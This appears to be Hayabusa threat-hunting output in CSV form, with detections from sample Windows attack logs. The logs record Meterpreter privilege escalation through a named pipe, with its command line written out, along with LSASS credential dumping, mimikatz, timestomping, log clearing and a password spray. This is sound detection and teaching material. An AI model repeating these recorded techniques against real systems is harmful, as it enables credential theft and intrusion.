2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3712 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2144 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010CE400E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1344 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-001058500E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:26:34.133 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\vboxsrv\HTools\m.exe | Tgt Process: C:\Windows\explorer.exe | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/meterpreter_migrate_to_explorer_sysmon_8.evtx
2019-04-30 16:46:15.215 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /c echo msdhch > \\.\pipe\msdhch | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4088 | PGUID: 365ABB72-FD47-5CC7-0000-00106AF61D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
2019-04-30 16:46:15.215 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
2019-04-30 19:12:45.583 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\system32\cmd.exe | PID: 3292 | PGUID: 365ABB72-1EFA-5CC8-0000-0010D3DE1C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx
2019-04-30 19:13:42.052 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\Explorer.EXE | CreationUtcTime: 2016-02-02 15:30:02.000 | PreviousCreationUtcTime: 2019-04-30 10:12:45.583 | PID: %PID% | PGUID: 365ABB72-16CD-5CC8-0000-0010483A0600,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-3FDE-5CC8-0000-0010142B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-3FDF-5CC8-0000-00103C480000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-0010014C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00101E4C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00104D520000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00100D550000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Evas,Security Log Cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:02.847 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:wstrzelec/zmathis/lpesce/psmith/lschifano/sanson/sarmstrong/drook/bgalbraith/melliott/bhostetler/edygert/ebooth/jleytevidal/jorchilles/bking/cdavis/jwright/celgee/jlake/gsalinas/jkulikowski/mdouglas/dpendolino/thessman/cfleener/cspizor/rbowes/bgreenwood/cmoody/mtoussain/eskoudis/smisenar/kperryman/cragoso/ssims/Administrator/dmashburn/baker/tbennett/econrad IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,-
2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
